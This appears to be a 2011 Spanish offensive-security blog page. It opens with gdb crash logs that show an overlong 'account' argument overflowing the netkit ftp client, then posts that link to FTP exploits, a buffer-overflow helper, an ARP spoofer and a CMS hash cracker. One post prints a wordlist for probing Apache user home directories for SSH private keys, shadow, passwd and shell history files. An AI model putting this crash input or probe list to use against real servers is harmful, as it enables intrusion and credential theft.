(gdb) i r
eax            0x0    0
ecx            0xc8e    3214
edx            0x6    6
ebx            0xc8e    3214
esp            0xbfffdde4    0xbfffdde4
ebp            0xbfffddf0    0xbfffddf0
esi            0x0    0
edi            0x2f6ff4    3108852
eip            0x12e416    0x12e416 <__kernel_vsyscall+2>
eflags         0x246    [ PF ZF IF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

============================================================================================================================================================

Ubuntu 11.04 x64 and Backtrack 5 R1 (which is based in Ubuntu) crash, too:
==========================================================================

Ubuntu 11.04 x64:
=================

$ gdb /usr/bin/ftp
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Para las instrucciones de informe de errores, vea:
<http://www.gnu.org/software/gdb/bugs/>...
Leyendo símbolos desde /usr/bin/ftp...(no se encontraron símbolos de depuración)hecho.
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.5 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff76c01d7]
/lib/x86_64-linux-gnu/libc.so.6(+0xfd0f0)[0x7ffff76bf0f0]
/lib/x86_64-linux-gnu/libc.so.6(+0xfc264)[0x7ffff76be264]
/usr/bin/ftp[0x404039]
/usr/bin/ftp[0x40ec18]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xff)[0x7ffff75e0eff]
/usr/bin/ftp[0x402889]
======= Memory map: ========
00400000-00414000 r-xp 00000000 08:03 262461                             /usr/bin/netkit-ftp
00613000-00614000 r--p 00013000 08:03 262461                             /usr/bin/netkit-ftp
00614000-00616000 rw-p 00014000 08:03 262461                             /usr/bin/netkit-ftp
00616000-00687000 rw-p 00000000 00:00 0                                  [heap]
7ffff62e2000-7ffff62f7000 r-xp 00000000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff62f7000-7ffff64f6000 ---p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f6000-7ffff64f7000 r--p 00014000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f7000-7ffff64f8000 rw-p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f8000-7ffff6b82000 r--p 00000000 08:03 269561                     /usr/lib/locale/locale-archive
7ffff6b82000-7ffff6b8d000 r-xp 00000000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6b8d000-7ffff6d8c000 ---p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8c000-7ffff6d8d000 r--p 0000a000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8d000-7ffff6d8e000 rw-p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8e000-7ffff6da5000 r-xp 00000000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6da5000-7ffff6fa4000 ---p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa4000-7ffff6fa5000 r--p 00016000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa5000-7ffff6fa6000 rw-p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa6000-7ffff6fa8000 rw-p 00000000 00:00 0
7ffff6fa8000-7ffff6fb0000 r-xp 00000000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff6fb0000-7ffff71af000 ---p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71af000-7ffff71b0000 r--p 00007000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b0000-7ffff71b1000 rw-p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b1000-7ffff71bd000 r-xp 00000000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff71bd000-7ffff73bc000 ---p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bc000-7ffff73bd000 r--p 0000b000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bd000-7ffff73be000 rw-p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73be000-7ffff73c0000 r-xp 00000000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff73c0000-7ffff75c0000 ---p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c0000-7ffff75c1000 r--p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c1000-7ffff75c2000 rw-p 00003000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c2000-7ffff774c000 r-xp 00000000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff774c000-7ffff794b000 ---p 0018a000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794b000-7ffff794f000 r--p 00189000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794f000-7ffff7950000 rw-p 0018d000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff7950000-7ffff7956000 rw-p 00000000 00:00 0
7ffff7956000-7ffff7996000 r-xp 00000000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7996000-7ffff7b95000 ---p 00040000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b95000-7ffff7b99000 r--p 0003f000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b99000-7ffff7b9a000 rw-p 00043000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b9a000-7ffff7bd3000 r-xp 00000000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7bd3000-7ffff7dd3000 ---p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd3000-7ffff7dd5000 r--p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd5000-7ffff7ddb000 rw-p 0003b000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7ddb000-7ffff7ddc000 rw-p 00000000 00:00 0
7ffff7ddc000-7ffff7dfd000 r-xp 00000000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7fcf000-7ffff7fd3000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00020000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7ffd000-7ffff7fff000 rw-p 00021000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

Program received signal SIGABRT, Aborted.
0x00007ffff75f5d05 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64    ../nptl/sysdeps/unix/sysv/linux/raise.c: No existe el fichero o el directorio.
    in ../nptl/sysdeps/unix/sysv/linux/raise.c
(gdb) i r
rax            0x0    0
rbx            0x0    0
rcx            0xffffffffffffffff    -1
rdx            0x6    6
rsi            0x5dea    24042
rdi            0x5dea    24042
rbp            0x7fffffffcfd0    0x7fffffffcfd0
rsp            0x7fffffffc608    0x7fffffffc608
r8             0x7ffff770d8c0    140737344755904
r9             0x400660    4195936
r10            0x8    8
r11            0x246    582
r12            0x9    9
r13            0x3a    58
r14            0x3a    58
r15            0x5    5
rip            0x7ffff75f5d05    0x7ffff75f5d05 <raise+53>
eflags         0x246    [ PF ZF IF ]
cs             0x33    51
ss             0x2b    43
ds             0x0    0
es             0x0    0
fs             0x0    0
gs             0x0    0
(gdb)

============================================================================================================================================================

Backtrack 5 R1:
===============

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7eea390]
/lib/tls/i686/cmov/libc.so.6(+0xe12ca)[0xb7ee92ca]
/lib/tls/i686/cmov/libc.so.6(+0xe07de)[0xb7ee87de]
/usr/bin/ftp[0x804b57c]
/usr/bin/ftp[0x8055abd]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e1ebd6]
/usr/bin/ftp[0x8049cb1]
======= Memory map: ========
08048000-08059000 r-xp 00000000 08:01 153580     /usr/bin/netkit-ftp
08059000-0805a000 r--p 00010000 08:01 153580     /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00011000 08:01 153580     /usr/bin/netkit-ftp
0805b000-0808a000 rw-p 00000000 00:00 0          [heap]
b7d58000-b7d75000 r-xp 00000000 08:01 1180       /lib/libgcc_s.so.1
b7d75000-b7d76000 r--p 0001c000 08:01 1180       /lib/libgcc_s.so.1
b7d76000-b7d77000 rw-p 0001d000 08:01 1180       /lib/libgcc_s.so.1
b7d88000-b7d8f000 r--s 00000000 08:01 159757     /usr/lib/gconv/gconv-modules.cache
b7d8f000-b7dce000 r--p 00000000 08:01 161313     /usr/lib/locale/en_US.utf8/LC_CTYPE
b7dce000-b7dd6000 r-xp 00000000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd6000-b7dd7000 r--p 00007000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd7000-b7dd8000 rw-p 00008000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd8000-b7deb000 r-xp 00000000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7deb000-b7dec000 r--p 00012000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7dec000-b7ded000 rw-p 00013000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7ded000-b7def000 rw-p 00000000 00:00 0
b7def000-b7df5000 r-xp 00000000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df5000-b7df6000 r--p 00006000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df6000-b7df7000 rw-p 00007000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df7000-b7e01000 r-xp 00000000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e01000-b7e02000 r--p 00009000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e02000-b7e03000 rw-p 0000a000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e03000-b7e04000 rw-p 00000000 00:00 0
b7e04000-b7e06000 r-xp 00000000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e06000-b7e07000 r--p 00001000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e07000-b7e08000 rw-p 00002000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e08000-b7f5b000 r-xp 00000000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5b000-b7f5c000 ---p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5c000-b7f5e000 r--p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5e000-b7f5f000 rw-p 00155000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5f000-b7f63000 rw-p 00000000 00:00 0
b7f63000-b7f97000 r-xp 00000000 08:01 1200       /lib/libncurses.so.5.7
b7f97000-b7f98000 ---p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f98000-b7f9a000 r--p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f9a000-b7f9b000 rw-p 00036000 08:01 1200       /lib/libncurses.so.5.7
b7f9b000-b7fca000 r-xp 00000000 08:01 1267       /lib/libreadline.so.6.1
b7fca000-b7fcb000 r--p 0002e000 08:01 1267       /lib/libreadline.so.6.1
b7fcb000-b7fce000 rw-p 0002f000 08:01 1267       /lib/libreadline.so.6.1
b7fce000-b7fcf000 rw-p 00000000 00:00 0
b7fdc000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0          [vdso]
b7fe3000-b7ffe000 r-xp 00000000 08:01 1123       /lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 08:01 1123       /lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 08:01 1123       /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0xb7fe2422 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0x659    1625
edx            0x6    6
ebx            0x659    1625
esp            0xbfffdbfc    0xbfffdbfc
ebp            0xbfffdc08    0xbfffdc08
esi            0x0    0
edi            0xb7f5dff4    -1208623116
eip            0xb7fe2422    0xb7fe2422 <__kernel_vsyscall+2>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Another Linux distribution did not crash, here is the example with Slackware 12:
================================================================================

Slackware 12:
=============

root@sl4ck1e:~# ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sorry, input line too long

ftp>

http://www.exploit-db.com/exploits/17806/
Publicado por localh0t en 15:13 1 comentarios
Etiquetas: , , , , , ,

10 ago 2011

BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit

Screenshots:



































Code:

http://www.exploit-db.com/exploits/17649/
Publicado por localh0t en 16:01 0 comentarios
Etiquetas: , , , , ,

9 ago 2011

Lista de algoritmos usados en CMS's & foros

Les dejo una útil lista con los distintos algoritmos de encriptación de passwords de distintos CMS's & foros, espero que les sirva. Saludos.



Publicado por localh0t en 0:58 0 comentarios
Etiquetas: , , , , ,

28 jul 2011

FreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit (No FTP Command Needed)

Les dejo un simple exploit codeado hace un par de horas para el servidor FTP FreeFloat, testeado en Windows XP SP3 (Spanish). Saludos.

Screenshot:



















Code:

http://pastebin.com/6dpSwvum
Publicado por localh0t en 20:55 0 comentarios
Etiquetas: , , , , , ,

20 jun 2011

Rainer v0.1 [Simple Buffer Overflow Tool]

Buenas gente, en esta ocasión les traigo un muy sencillo script escrito en Perl, sirve básicamente para testear buffer overflows pasados por argumento, seteando la shellcode, la dirección de retorno, y la cantidad de NOP's a utilizar. Útil para la gente que esta comenzando en el mundo del exploiting (me incluyo).


Screenshot:


Código del ejemplo (ExploitMe.c - Thanks Vivek):

http://paste2.org/p/1481203

Código del script (rainer.pl):

http://www.paste2.org/p/1481196
Publicado por localh0t en 20:32 0 comentarios
Etiquetas: , , , , , ,

16 jun 2011

Apache-Home Finder

Script codeado hace un tiempo. Busca archivos/carpetas interesantes en los home's del servidor (corriendo Apache y que tenga la opción de acceso con ~, es decir, se permita acceder a http://www.website.com/~nombreusuario/).
Para ello se necesitan de dos archivos de texto, el primero, con la lista de usuarios a probar (que podremos haber sacado por brute-force, mediante LFI, LOAD_FILE, etc.), y segundo, la lista con directorios a probar en cada uno de los home's de cada usuario.

Ejemplos:

users.txt


root
ftp
mysql
bin
daemon
ibsoc
ifsca
aminen
dpisf
idsum
ieduc
ivivi
itcp
sergio
juan
backup
imosp
publish
gbrusa
igobi
iforo
ispyc
amoran
mysqldump
mesaadm
sinrespuesta
amgarcia
mcabrera
boletinoficial
dsum
improd
patricia
mauro
agostina
lucila
hyperic
nagios
clamav

dirs.txt


index.htm
index.html
index.php
.bash_history
.bashrc
.ftpquota
.gbent
.grc
.gui
.host
.hosts
.jpilot
.master
.members
.mysql_history
.net
.nsconfig
.pass
.passes
.pwd
.ssh/
.ssh/know_hosts
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/id_rsa.priv
.ssh/id_rsa.key
host
hosts
passwd
shadow
 
Código:





http://pastebin.com/zkVVGWXZ








Publicado por
localh0t


en
17:53


0
comentarios
































          

        

          

        

14 jun 2011


          

        







Perl ARP-Spoofer v0.2










Les dejo este código que escribí hace un par de meses, sencillo script en Perl para hacer arp-spoofing entre dos hosts. Lindo para utilizar cuando por alguna razón no puede utilizar arpspoof de la suite dsniff, o solo por comodidad.



Requiere: Net::ARP & Net::Ping 





Screenshot:






Wireshark dump:










Código:



http://pastebin.com/3M0bajBE








Publicado por
localh0t


en
18:39


0
comentarios

















Etiquetas:
,
,
,
,
,
















          

        

          

        

13 jun 2011


          

        







Multi CMS Hash Cracker v0.1 [Wordlists]










Para inagurar el blog, les dejo este script que había codeado hace un par de días, espero que les sea de utilidad. Sirve para crackear hashes de distintos CMS (Content Management System), código simple pero funcional.



Actualmente soporta:




  • vBulletin
    • 

  • Simple Machines Forum
    • 

  • Invision Power Board
    • 

  • Joomla 1.x 
    • 



El código esta hecho con funciones para posteriormente agregar soporte a nuevos tipos de hashes rápidamente. 



Screenshot:








Código:



http://pastebin.com/WN1inbLE








Publicado por
localh0t


en
19:58


1 comentarios

















Etiquetas:
,
,
,
,
,
,
,
















          

        

          

        

10 jun 2011


          

        







Inaguración del blog










Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do  eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad  minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip  ex ea commodo consequat. Duis aute irure dolor in reprehenderit in  voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur  sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt  mollit anim id est laborum.








Publicado por
localh0t


en
8:03


0
comentarios
































        

      









Suscribirse a:
Entradas (Atom)